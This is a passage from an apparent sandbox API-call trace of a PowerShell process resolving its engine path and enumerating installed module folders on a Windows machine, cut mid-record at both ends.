lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.380] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.WSF" (normalized: "c:\\windows\\get-\x9f.wsf"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.380] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.380] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.384] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0280.384] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0280.384] CoTaskMemFree (pv=0x25b73cfe7c0) [0280.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d5f8 | out: phkResult=0x653ef8d5f8*=0x20c) returned 0x0 [0280.384] RegQueryValueExW (in: hKey=0x20c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d648, lpData=0x0, lpcbData=0x653ef8d640*=0x0 | out: lpType=0x653ef8d648*=0x1, lpData=0x0, lpcbData=0x653ef8d640*=0x56) returned 0x0 [0280.385] RegQueryValueExW (in: hKey=0x20c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d648, lpData=0x25b5c16c4f0, lpcbData=0x653ef8d640*=0x56 | out: lpType=0x653ef8d648*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d640*=0x56) returned 0x0 [0280.385] RegCloseKey (hKey=0x20c) returned 0x0 [0280.658] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0280.664] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0280.669] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0280.699] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0280.699] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.699] CoTaskMemFree (pv=0x25b73d007a0) [0280.700] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0280.700] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.700] CoTaskMemFree (pv=0x25b73cfb4c0) [0280.716] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d00e00 [0280.716] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d00e00 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.717] CoTaskMemFree (pv=0x25b73d00e00) [0280.717] GetCurrentProcess () returned 0xffffffffffffffff [0280.717] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x20c) returned 1 [0280.717] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0280.718] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984ef0 [0280.718] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x1, TokenInformation=0x25b73984ef0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984ef0, ReturnLength=0x653ef8d6b8) returned 1 [0280.718] LocalFree (hMem=0x25b73984ef0) returned 0x0 [0280.719] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c3d4360, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c3d4360*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0280.720] CreateMutexW (lpMutexAttributes=0x25b5c3d44b0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6ec [0280.720] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x6ec, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0280.721] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff8c0 [0280.721] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff8c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.721] CoTaskMemFree (pv=0x25b73cff8c0) [0280.721] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0280.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0280.721] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c3d4b50 | out: lpFileInformation=0x25b5c3d4b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0280.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0280.722] ReleaseMutex (hMutex=0x6ec) returned 1 [0280.722] CoCreateGuid (in: pguid=0x653ef8d6c8 | out: pguid=0x653ef8d6c8*(Data1=0xd9c04588, Data2=0x5105, Data3=0x4a11, Data4=([0]=0x91, [1]=0x34, [2]=0x51, [3]=0xe, [4]=0x2f, [5]=0x2a, [6]=0x69, [7]=0x55))) returned 0x0 [0280.722] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8ec [0280.722] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7b0 [0280.722] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8f0 [0280.722] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f4 [0280.722] SetEvent (hEvent=0x7f4) returned 1 [0280.722] SetEvent (hEvent=0x8ec) returned 1 [0280.722] SetEvent (hEvent=0x7b0) returned 1 [0280.723] SetEvent (hEvent=0x8f0) returned 1 [0280.723] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x908 [0280.723] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.727] EtwEventActivityIdControl () returned 0x0 [0280.727] EtwEventActivityIdControl () returned 0x0 [0280.727] EtwEventActivityIdControl () returned 0x0 [0280.734] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfce40 [0280.734] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfce40, nSize=0x105 | out: lpBuffer="") returned 0x97 [0280.734] CoTaskMemFree (pv=0x25b73cfce40) [0280.734] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0280.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.734] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0280.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.737] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0280.750] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0280.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.750] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0280.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0280.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.750] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0280.750] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0280.750] CoTaskMemFree (pv=0x25b73cfa3c0) [0280.751] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0280.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.751] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0280.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.753] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0280.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0280.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.764] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0280.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.764] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0280.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0280.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0280.765] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.765] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.765] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0280.766] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0280.766] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0280.766] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0280.766] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.766] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0280.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0280.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0280.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0280.767] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.767] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.767] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0280.768] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0280.768] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0280.768] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0280.768] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0280.769] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0280.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0280.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0280.769] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.769] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, 